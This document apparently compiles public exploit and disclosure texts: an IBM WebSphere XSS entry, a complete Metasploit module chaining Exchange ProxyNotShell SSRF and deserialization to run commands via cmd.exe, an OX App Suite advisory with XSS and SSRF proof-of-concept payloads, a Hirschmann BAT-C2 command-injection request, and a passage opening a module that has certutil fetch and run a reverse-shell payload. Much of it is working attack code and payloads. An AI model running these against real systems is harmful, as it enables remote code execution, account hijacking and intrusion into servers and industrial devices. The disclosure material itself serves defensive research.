<pre><code># Exploit Title: IBM Websphere Application Server 7.0 - Persistent Cross-Site Scripting (Authenticated)<br /># Date: 2022-12-02<br /># Author: Milad karimi<br /># Software Link: https://www.ibm.com/support/pages/6107-websphere-application-server-v61-fix-pack-7-windows<br /># Version: 7.0<br /># Tested on: Windows 10<br /># CVE: 2009-0855<br /><br />1. Description:<br />The WebSphere administrative console (/ibm/console/) appears to reflect the requested URL path into its response without output encoding, so script markup placed in the path segment is executed in the browser of a user who opens the link. The title marks the issue as authenticated: the victim needs an active console session for the reflected script to run in a meaningful context. Reviewer notes: (a) the title says "Persistent", but the proof of concept below is a reflected XSS — the payload travels in the URL and nothing is stored on the server; (b) the header references CVE-2009-0855, which predates the 2022 write-up date by more than a decade, so confirm that the target is an unpatched 7.0 build before relying on this; (c) the software link points to a v6.1 fix-pack page rather than to version 7.0.<br /><br />2. Proof of Concept:<br />http://www.example.com/ibm/console/<script>alert('Ex3ptionaL_XSS')</script><br />http://www.example.com/ibm/console/<script>alert('Ex3ptionaL_XSS')</script>.jsp<br /></code></pre>
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# ProxyNotShell: an authenticated SSRF through the Autodiscover front end
# (CVE-2022-41040) is used to reach the Exchange PowerShell backend, where a
# deserialization flaw (CVE-2022-41082) is driven with a XAML gadget (see
# XamlLoaderGadget at the bottom of this file) to run an arbitrary command.
# Valid mailbox credentials (USERNAME/PASSWORD, optionally DOMAIN) are
# required; the SSRF and PowerShell-backend helpers (execute_powershell,
# exchange_get_version) come from the Exchange / ProxyMaybeShell mixins.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HTTP::Exchange
  include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell
  include Msf::Exploit::EXE

  # Registers module metadata, the mandatory credential options and the
  # advanced EemsBypass switch, which defaults to the IBM037 encoding trick
  # applied in send_http to get past the Exchange Emergency Mitigation Service
  # (EEMS) URL-rewrite rule; set it to 'none' to send the plain SSRF URI.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft Exchange ProxyNotShell RCE',
        'Description' => %q{
          This module chains two vulnerabilities on Microsoft Exchange Server
          that, when combined, allow an authenticated attacker to interact with
          the Exchange Powershell backend (CVE-2022-41040), where a
          deserialization flaw can be leveraged to obtain code execution
          (CVE-2022-41082). This exploit only support Exchange Server 2019.

          These vulnerabilities were patched in November 2022.
        },
        'Author' => [
          'Orange Tsai', # Discovery of ProxyShell SSRF
          'Spencer McIntyre', # Metasploit module
          'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis
          'Piotr Bazydło', # Vulnerability analysis
          'Rich Warren', # EEMS bypass via ProxyNotRelay
          'Soroush Dalili' # EEMS bypass
        ],
        'References' => [
          [ 'CVE', '2022-41040' ], # ssrf
          [ 'CVE', '2022-41082' ], # rce
          [ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ],
          [ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ],
          [ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ],
          [ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ]
        ],
        'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08
        'License' => MSF_LICENSE,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'Platform' => ['windows'],
        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
        'Privileged' => true,
        'Targets' => [
          [
            'Windows Dropper',
            {
              'Platform' => 'windows',
              'Arch' => [ARCH_X64, ARCH_X86],
              'Type' => :windows_dropper
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => 'windows',
              'Arch' => [ARCH_CMD],
              'Type' => :windows_command
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'AKA' => ['ProxyNotShell'],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    register_options([
      OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]),
      OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),
      OptString.new('DOMAIN', [ false, 'The domain to authenticate to' ])
    ])

    register_advanced_options([
      OptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]])
    ])
  end

  # Two-step probe. First a GET to /mapi/nspi/ is sent through the SSRF
  # wrapper (send_http) and must come back 200 with the MAPI/HTTP title;
  # then the harmless Get-Mailbox cmdlet is run through the PowerShell
  # backend. Returns Unknown for no response or a 401, Safe when either step
  # fails, Vulnerable otherwise.
  # NOTE(review): a Msf::Exploit::Failed raised from execute_powershell (for
  # example wrong USERNAME/PASSWORD/DOMAIN) is also mapped to Safe rather than
  # Unknown, so a Safe verdict is only meaningful with known-good credentials.
  def check
    @ssrf_email ||= Faker::Internet.email
    res = send_http('GET', '/mapi/nspi/')
    return CheckCode::Unknown if res.nil?
    return CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401
    return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'

    # actually run the powershell cmdlet and see if it works, this will fail if:
    # * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN)
    # * the exchange emergency mitigation service M1 rule is in place
    return CheckCode::Safe unless execute_powershell('Get-Mailbox')

    CheckCode::Vulnerable
  rescue Msf::Exploit::Failed => e
    CheckCode::Safe(e.to_s)
  end

  # Re-encodes +string+ as IBM037 (EBCDIC) and drops the encoding tag so the
  # raw bytes can be spliced into a URI. Used only by the EEMS bypass below.
  def ibm037(string)
    string.encode('IBM037').force_encoding('ASCII-8BIT')
  end

  # Wraps every request in the Autodiscover SSRF (CVE-2022-41040): the real
  # backend +uri+ is placed in the query string of /Autodiscover/autodiscover.json
  # behind a throw-away e-mail address, followed by an
  # "Email=Autodiscover/autodiscover.json?<addr>" part so the front end still
  # treats the request as Autodiscover. NTLM authentication with
  # USERNAME/PASSWORD is forced on every call: any :authentication the caller
  # passed in +opts+ is overwritten, and +opts+ is mutated in place.
  #
  # When +uri+ targets the PowerShell backend and EemsBypass is IBM037v1, the
  # whole query is sent as IBM037 bytes and the request carries
  # X-Up-Devcap-Post-Charset plus a "UP "-prefixed User-Agent so that ASP.NET
  # decodes it server-side (see the referencesource link), presumably before
  # the EEMS rewrite rule sees the plain-ASCII form — the ProxyNotRelay
  # technique from the references. With EemsBypass=none the ASCII URI is sent.
  def send_http(method, uri, opts = {})
    opts[:authentication] = {
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD'],
      'preferred_auth' => 'NTLM'
    }

    if uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1'
      uri = "/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' + @ssrf_email)}"
      opts[:headers] = {
        'X-Up-Devcap-Post-Charset' => 'IBM037',
        # technique needs the "UP" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362
        'User-Agent' => "UP #{datastore['UserAgent']}"
      }
    else
      uri = "/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}"
    end

    super(method, uri, opts)
  end

  # Entry point. With AutoCheck on and ForceExploit off, the Exchange build is
  # read first and anything below 15.2 is refused, because the XAML gadget is
  # only known to work on Exchange Server 2019 (ForceExploit skips this
  # guard). Then dispatches on the selected target: the raw command payload,
  # or the CmdStager dropper for a native payload (linemax bounds the length
  # of each staged command line passed to execute_command).
  def exploit
    # if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not
    # work on Exchange Server 2016
    if datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version)
      vprint_status("Detected Exchange version: #{version}")
      if version < Rex::Version.new('15.2')
        fail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)')
      end
    end

    @ssrf_email ||= Faker::Internet.email

    case target['Type']
    when :windows_command
      vprint_status("Generated payload: #{payload.encoded}")
      execute_command(payload.encoded)
    when :windows_dropper
      execute_cmdstager({ linemax: 7_500 })
    end
  end

  # Runs +cmd+ on the server through CVE-2022-41082. The XAML resource
  # dictionary makes an ObjectDataProvider call System.Diagnostics.Process.Start
  # with "cmd.exe" and "/c <cmd>"; cmd.encode(xml: :text) escapes XML
  # metacharacters so the command cannot break out of its <System:String>
  # element. The XAML is then embedded (as CDATA) in a PSRP-style <Obj> whose
  # TargetTypeForDeserialization property carries a base64 BinaryFormatter
  # stream (XamlLoaderGadget) naming System.Windows.Markup.XamlReader as the
  # type to deserialize into, and the whole object is passed as the -Identity
  # argument of Get-Mailbox. +_opts+ is unused; it exists for the CmdStager
  # callback signature.
  def execute_command(cmd, _opts = {})
    xaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root
      <ResourceDictionary
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:System="clr-namespace:System;assembly=mscorlib"
        xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
        <ObjectDataProvider x:Key="LaunchCalch" ObjectType="{x:Type Diag:Process}" MethodName="Start">
          <ObjectDataProvider.MethodParameters>
            <System:String>cmd.exe</System:String>
            <System:String>/c #{cmd.encode(xml: :text)}</System:String>
          </ObjectDataProvider.MethodParameters>
        </ObjectDataProvider>
      </ResourceDictionary>
    XAML

    identity = Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root
      <Obj N="V" RefId="14">
        <TN RefId="1">
          <T>System.ServiceProcess.ServiceController</T>
          <T>System.Object</T>
        </TN>
        <ToString>Object</ToString>
        <Props>
          <S N="Name">Type</S>
          <Obj N="TargetTypeForDeserialization">
            <TN RefId="1">
              <T>System.Exception</T>
              <T>System.Object</T>
            </TN>
            <MS>
              <BA N="SerializationData">
                #{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)}
              </BA>
            </MS>
          </Obj>
        </Props>
        <S>
          <![CDATA[#{xaml}]]>
        </S>
      </Obj>
    IDENTITY

    execute_powershell('Get-Mailbox', args: [
      { name: '-Identity', value: identity }
    ])
  end
end

# Builds the minimal BinaryFormatter (MS-NRBF) stream that execute_command
# embeds as SerializationData: one System.UnitySerializationHolder record whose
# Data member names System.Windows.Markup.XamlReader and whose AssemblyName
# points at PresentationFramework, so the backend resolves that type and hands
# it the XAML string. UnityType 4 is presumably the RuntimeType kind of
# UnitySerializationHolder — confirm against the .NET reference source; the
# additional_infos value 8 is the MS-NRBF primitive type code for Int32,
# matching the Primitive member type of UnityType.
class XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream
  include Msf::Util::DotNetDeserialization

  # Returns the serialized stream: header record, the single class record
  # with its three members, and the MessageEnd marker.
  def self.generate
    from_values([
      Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),
      Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(
        class_info: Types::General::ClassInfo.new(
          obj_id: 1,
          name: 'System.UnitySerializationHolder',
          member_names: %w[Data UnityType AssemblyName]
        ),
        member_type_info: Types::General::MemberTypeInfo.new(
          binary_type_enums: %i[String Primitive String],
          additional_infos: [ 8 ]
        ),
        member_values: [
          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
            obj_id: 2,
            string: 'System.Windows.Markup.XamlReader'
          )),
          4,
          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
            obj_id: 3,
            string: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'
          ))
        ]
      ),
      Types::RecordValues::MessageEnd.new
    ])
  end
end
<pre><code>Product: OX App Suite<br />Vendor: OX Software GmbH<br /><br /><br /><br />Internal reference: OXUIB-1654<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev37, 7.10.6-rev16<br />Vendor notification: 2022-05-23<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-31469<br />CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />The detection mechanism for "deep links" in E-Mail (e.g. links pointing to OX Drive) allows an attacker to inject references to arbitrary, non-existent applications. The PoC below uses URL-encoded "../" segments in the "app" parameter to escape the expected application namespace, so following such a link makes the client request unexpected content from the App Suite origin, potentially including script code.<br /><br />Risk:<br />Malicious script code can be executed within the victim's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). 
To exploit this an attacker would require the victim to follow a hyperlink.<br /><br />PoC:<br /><a class="deep-link-app" href="https://test/#!!&app=%2e./%2e./%2e./%2e./%2e./%2e./appsuite/apps/themes/default/logo.png?cut=&id=123"><br /><br />Solution:<br />We improved deep-link validation to avoid malicious use.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: OXUIB-1678<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev37, 7.10.6-rev16, 8.3<br />Vendor notification: 2022-05-30<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-37307<br />CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />Certain content like E-Mail signatures are stored using the "snippets" mechanism. This mechanism contains a weakness that allows to inject seemingly benign HTML content, like XHTML CDATA constructs, that will be sanitized to malicious code. Once such code is in place it can be used for persistent access to the users account.<br /><br />Risk:<br />Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). 
To exploit this an attacker would require access to the same OX App Suite instance or temporary access to the users account.<br /><br />PoC:<br /><![CDATA[<br /><bo<script></script>dy>AA<img src onerror="alert('XSS')">BB</body><br />]]><br /><br />Solution:<br />We improved the sanitizing algorithm to deal with disguised code.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: OXUIB-1731<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev37, 7.10.6-rev16, 8.3<br />Vendor notification: 2022-06-22<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-37308<br />CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />Plain-text mail that contains HTML code can be used to inject script code when printing E-Mail.<br /><br />Risk:<br />Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). 
To exploit this an attacker would need to make the victim print a malicious E-Mail.<br /><br />PoC:<br />...<br />Content-Type: text/plain<br /><img src onerror="alert('XSS')"><br /><br />Solution:<br />We removed plain-text specific code and use existing sanitization mechanisms for HTML content.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: OXUIB-1732<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev37, 7.10.6-rev16, 8.4<br />Vendor notification: 2022-06-22<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-37309<br />CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />Contacts that do not contain a name but only a e-mail address can be used to inject script code to the "contact picker" component, commonly used to select contacts as recipients or participants.<br /><br />Risk:<br />Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). 
To exploit this an attacker would require access to the same OX App Suite instance or make the victim import malicious contact data.<br /><br />Solution:<br />We now apply proper HTML escaping to all relevant data sets.<br /><br /><br /><br />---<br /><br /><br /><br />Affected product: OX App Suite<br />Internal reference: OXUIB-1785<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev37, 7.10.6-rev16, 8.4<br />Vendor notification: 2022-07-20<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-37310<br />CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />The metrics and help modules use parts of the URL to determine capabilities. This mechanism suffers from a weakness that allows attackers to use special characters that register malicious capabilities, which will be executed as script code after login.<br /><br />Risk:<br />Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink to its App Suite instance and login. 
While the "metrics" module is optional, the "help" module is available on all instances.<br /><br />PoC:<br />https://appsuite.example.com/appsuite/#!!&app=io.ox/files&cap=t,(()%3d>{$$%3d%2bf;$f%3d%2b!f;$t%3d$f%2b!f;f$%3d$t|!f;t$%3df$%2b!f;$$f%3dt$|!f;$$t%3d$$f%2b!f;$f$%3d$$t|!f;$t$%3d(""%2b{})[$$f]%2b(""%2b{})[$f]%2b(""%2b[][f])[$f]%2b"f"[f$]%2b"t"[$$]%2b"t"[$f]%2b"t"[$t]%2b(""%2b{})[$$f]%2b"t"[$$]%2b(""%2b{})[$f]%2b"t"[$f];$$$%3d[][$t$][$t$];$$$("$$$('"%2b'\\'%2b$f%2bt$%2b$f%2b'\\'%2b$f%2b$$f%2bt$%2b'\\'%2b$f%2bt$%2b$$f%2b'\\'%2b$f%2b$$t%2b$t%2b'\\'%2b$f%2b$$t%2bt$%2b'('%2b'"'%2b'\\'%2b$f%2bf$%2b$$%2b'\\'%2b$f%2b$t%2bf$%2b'\\'%2b$f%2b$t%2bf$%2b'"'%2b')'%2b"')();")()})()<br /><br />Solution:<br />We sanitized any non-parsable characters from the capabilities input.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1712<br />Vulnerability type: Server-Side Request Forgery (CWE-918)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: backend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev47, 7.10.6-rev22, 8.4<br />Vendor notification: 2022-07-14<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-37313<br />CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />Deny-lists regarding external connections can be bypassed by using malicious DNS records with more than one A or AAAA response.<br /><br />Risk:<br />Server-initiated requests to external resources (e.g. E-Mail accounts, data feeds) can be directed to internal resources that are restricted based on deny-list settings. This can be used to determine "internal" addresses and services, depending on measurement and content of error responses. 
While no data of such services can be exfiltrated, the risk is a violation of perimeter-based security policies.<br /><br />PoC:<br />Use API calls to set up an external mail account and provide an attacker-controlled domain whose name resolves to more than one A or AAAA record. Only the first record is validated against the deny-list, while the connection may later be established to any of the returned addresses, so a second record can point at an internal host that the deny-list was meant to block.<br /><br />Solution:<br />We improved the analysis of DNS responses and check all available records against deny-list entries. (Reviewer note: this addresses multi-record answers; whether the validated address is also the one used for the outgoing connection — the classic DNS-rebinding variant, where the answer changes between lookup and connect — is not stated here and should be confirmed separately.)<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1713<br />Vulnerability type: Uncontrolled Resource Consumption (CWE-400)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: backend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev47, 7.10.6-rev22, 8.3<br />Vendor notification: 2022-07-14<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-37312<br />CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)<br /><br />Vulnerability Details:<br />The size of the request body for certain API endpoints was not sufficiently checked for plausibility.<br /><br />Risk:<br />Requests can be abused to consume large amounts of memory and eventually lead to resource exhaustion. Since such requests are highly asymmetric in terms of resource requirements between the client and the server, they can be scaled to such a degree that the system becomes temporarily unresponsive for all users. 
Those requests do not require authentication.<br /><br />PoC:<br />Sending a large request body containing a "redirect" URL to the "deferrer" servlet.<br /><br />Solution:<br />We now enforce checks that make sure only requests with plausible size are being processed to avoid uncontrolled resource usage.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1714<br />Vulnerability type: Uncontrolled Resource Consumption (CWE-400)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: backend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev47, 7.10.6-rev22, 8.3<br />Vendor notification: 2022-07-14<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-37311<br />CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)<br /><br />Vulnerability Details:<br />The size of the request parameters for certain API endpoints were not sufficiently checked for plausible sizes.<br /><br />Risk:<br />Requests can be abused to consume large amounts of memory and eventually lead to resource exhaustion. Since such requests are highly asymmetric in terms of resource requirements between the client and the server, they can be scaled to such a degree that the system becomes temporarily unresponsive for all users. Those requests do not require authentication.<br /><br />PoC:<br />Sending a large "location" request parameter to the "redirect" servlet.<br /><br />Solution:<br />We now enforce checks that make sure only requests with plausible size are being processed to avoid uncontrolled resource usage.<br /></code></pre>
<pre><code>CyberDanube Security Research 20221124-0<br />-------------------------------------------------------------------------------<br /> title| Authenticated Command Injection<br /> product| Hirschmann (Belden) BAT-C2<br /> vulnerable version| 8.8.1.0R8<br /> fixed version| 09.13.01.00R04<br /> CVE number| CVE-2022-40282<br /> impact| High<br /> homepage| https://hirschmann.com/<br /> | https://beldensolutions.com<br /> found| 2022-08-01<br /> by| T. Weber (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"The Technology and Market Leader in Industrial Networking. Hirschmann™<br />develops innovative solutions, which are geared towards its customers’<br />requirements in terms of performance, efficiency and investment<br />reliability."<br /><br />Source: <br />https://beldensolutions.com/en/Company/About_Us/belden_brands/index.phtml<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />Hirschmann BAT-C2 / 8.8.1.0R8<br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The web server of the device is prone to an authenticated command injection.<br />It allows an attacker to gain full access to the underlying operating <br />system of<br />the device with all implications. 
If such a device is acting as key <br />device in<br />an industrial network, or controls various critical equipment via serial <br />ports,<br />more extensive damage in the corresponding network can be done by an <br />attacker.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The command "ping 192.168.1.1" was injected to the system by using the<br />following POST request:<br />===============================================================================<br />POST / HTTP/1.1<br />Host: 192.168.3.150<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 <br />Firefox/91.0<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 75<br />Origin: https://192.168.3.150<br />Authorization: Digest username="admin", realm="config", <br />nonce="4b63bb796252d310", uri="/", algorithm=MD5, <br />response="dbcf03216bd8fbaa15f4b9d9d0fc1d43", qop=auth, nc=0000000a, <br />cnonce="99c14d39557e691d"<br />Referer: https://192.168.3.150/<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />ajax=FsCreateDir&dir='%3Bping%20192.168.1.1%3B'&iehack=&submit=Create&cwd=/<br />=============================================================================== <br /><br /><br />The vulnerability was manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br />Solution<br />-------------------------------------------------------------------------------<br />Upgrade to firmware version 09.13.01.00R04 or above.<br /><br />A security bulletin for this vulnerability has been published by the vendor:<br />https://www.belden.com/dfsmedia/f1e38517e0cd4caa8b1acb6619890f5e/15088-source/<br /><br 
/>Workaround<br />-------------------------------------------------------------------------------<br />None. (Reviewer note: the injection requires valid device credentials — the PoC above authenticates with HTTP Digest as "admin" — so until the firmware is updated, restricting network access to the web interface and replacing default administrator credentials reduces exposure; it does not remove the flaw.)<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends customers of Hirschmann to upgrade the firmware to the<br />latest version available. Furthermore, a full security review by professionals<br />is recommended.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2022-08-03: Contacted Hirschmann via BEL-SM-PSIRT@belden.com; Belden contact<br /> suspects a duplicate. Asked contact for more information.<br />2022-08-18: Belden representative sent more information for clarification.<br /> Highlighted differences between PoCs.<br />2022-08-22: Belden contact confirmed the vulnerability to be no duplicate.<br />2022-08-30: Asked for an update.<br />2022-08-31: Vendor stated that it will release another security bulletin for<br /> this vulnerability.<br />2022-09-27: Asked for an update.<br />2022-09-28: Vendor is currently testing the new firmware version and has also<br /> been assigned a CVE number. Draft of security bulletin was<br /> also sent by the security contact.<br />2022-10-12: Asked for an update.<br />2022-10-13: Belden contact stated that there is no publication date for now as<br /> another patch must be integrated.<br />2022-10-28: Security contact informed us that the patch will be released<br /> within the next two weeks.<br />2022-11-22: Asked for a status update; Security contact stated that the<br /> release was delayed due to internal reasons.<br />2022-11-23: Vendor sent the final version of the security bulletins. 
The<br /> release of the new firmware version will be 2022-11-28.<br />2022-11-24: Vendor informed CyberDanube that the release of the bulletin and<br /> the firmware was done on 2022-11-23 by the marketing team.<br /> Coordinated release of security advisory.<br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF T. Weber / @2022<br /><br /></code></pre>
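##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Abuses the Remote Control Server's UDP keystroke protocol (only when no
# password is configured, which is the default) to type commands into a
# cmd.exe window on the victim: it opens a prompt through the Windows key,
# has certutil pull a file from this module's own HTTP server into PATH and
# either runs it (exploit) or deletes it again (check).
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Exploit::Remote::Udp
  include Exploit::EXE # generate_payload_exe
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::FileDropper

  # Module metadata and options. CLIENTNAME is registered but is not read by
  # any method in this file.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Remote Control Collection RCE',
        'Description' => %q{
          This module utilizes the Remote Control Server's, part
          of the Remote Control Collection by Steppschuh, protocol
          to deploy a payload and run it from the server. This module will only deploy
          a payload if the server is set without a password (default).
          Tested against 3.1.1.12, current at the time of module writing
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'H4rk3nz0' # edb, discovery
        ],
        'References' => [
          [ 'URL', 'http://remote-control-collection.com' ],
          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py' ]
        ],
        'Arch' => [ ARCH_X64, ARCH_X86 ],
        'Platform' => 'win',
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'Targets' => [
          ['default', {}],
        ],
        'DefaultOptions' => {
          'PAYLOAD' => 'windows/shell/reverse_tcp',
          'WfsDelay' => 5,
          'Autocheck' => false
        },
        'DisclosureDate' => '2022-09-20',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
        }
      )
    )
    register_options(
      [
        OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1926]),
        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
        OptString.new('PATH', [true, 'Where to stage payload for pull method', '%temp%\\']),
        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),
      ]
    )
  end

  # PATH with a guaranteed trailing backslash so a file name can be appended.
  def path
    return datastore['PATH'] if datastore['PATH'].end_with? '\\'

    "#{datastore['PATH']}\\"
  end

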